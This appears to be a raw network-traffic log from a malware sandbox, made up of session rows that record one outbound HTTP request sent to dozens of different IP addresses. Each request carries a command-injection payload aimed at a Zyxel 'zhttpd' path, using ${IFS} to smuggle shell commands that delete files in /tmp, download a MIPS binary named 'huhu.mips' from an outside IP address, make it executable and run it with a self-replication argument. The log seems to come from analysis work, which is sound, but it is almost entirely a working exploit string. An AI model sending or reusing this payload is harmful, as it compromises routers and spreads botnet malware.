                                                        Feb 2, 2024 06:21:27.274837017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8602192.168.2.1439316197.211.237.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274868965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8603192.168.2.1442476218.27.222.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274910927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8604192.168.2.144158634.9.12.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274965048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8605192.168.2.144846476.0.237.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.274981022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8606192.168.2.1445164131.205.144.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275024891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8607192.168.2.144009818.48.177.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275074959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8608192.168.2.1448162101.56.117.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275122881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8609192.168.2.1440684147.72.95.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275162935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8610192.168.2.1432928186.153.145.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275198936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8611192.168.2.1452502188.137.79.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275244951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8612192.168.2.1457236216.138.196.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275284052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8613192.168.2.1433236190.213.20.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275314093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8614192.168.2.145823458.112.84.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275365114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8615192.168.2.143965841.239.240.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275379896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8616192.168.2.1455850218.238.66.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275443077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8617192.168.2.1446812170.77.39.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275479078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8618192.168.2.145096248.88.9.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275527000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8619192.168.2.14419861.84.251.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275572062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8620192.168.2.1437812142.145.4.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275608063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8621192.168.2.1443862158.133.52.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275657892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8622192.168.2.1441278146.101.68.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275690079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8623192.168.2.143832096.47.83.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275736094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8624192.168.2.1449650154.192.116.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275790930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8625192.168.2.1451326145.163.204.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275823116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8626192.168.2.1450668122.224.175.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275868893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8627192.168.2.1459848158.151.68.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275901079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8628192.168.2.1442772120.214.4.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275952101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8629192.168.2.1442530218.126.35.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.275993109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8630192.168.2.1436774207.121.171.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276057959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8631192.168.2.1443104110.138.147.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276066065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8632192.168.2.144789653.173.218.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276098013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8633192.168.2.1441522134.48.70.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276141882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8634192.168.2.14439349.22.226.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276189089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8635192.168.2.1450758152.60.211.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276221991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8636192.168.2.1447004175.167.4.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276253939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8637192.168.2.1451168159.189.32.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276290894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8638192.168.2.1456254159.1.215.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276328087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8639192.168.2.144609241.238.76.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276355982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8640192.168.2.146002868.244.34.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276412964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8641192.168.2.145020218.77.42.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276453018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8642192.168.2.145546266.83.191.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276506901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8643192.168.2.143597287.63.236.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276535034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8644192.168.2.145388079.135.147.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276586056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8645192.168.2.1458810191.225.139.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276627064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8646192.168.2.1454354172.40.148.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276684999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8647192.168.2.1439066222.3.97.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276719093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8648192.168.2.143381248.233.149.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276772022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8649192.168.2.1455004125.238.194.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276814938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8650192.168.2.1458382176.92.73.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276854038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8651192.168.2.1455612190.39.228.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276894093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8652192.168.2.1451182157.171.131.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276922941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8653192.168.2.1435808193.217.166.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276982069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8654192.168.2.1451170167.2.209.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.276998043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8655192.168.2.1447236202.134.32.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277048111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8656192.168.2.1442050121.192.244.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277081966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8657192.168.2.1452540118.242.169.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277132034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8658192.168.2.145834039.236.41.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277165890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8659192.168.2.1439934111.149.53.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277219057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8660192.168.2.1443912175.20.98.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277272940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8661192.168.2.1441416164.125.184.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277302980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8662192.168.2.1448886194.249.220.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277342081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8663192.168.2.145593869.203.170.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.277370930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8664192.168.2.1452272137.59.125.34443
                                                        TimestampBytes transferredDirectionData
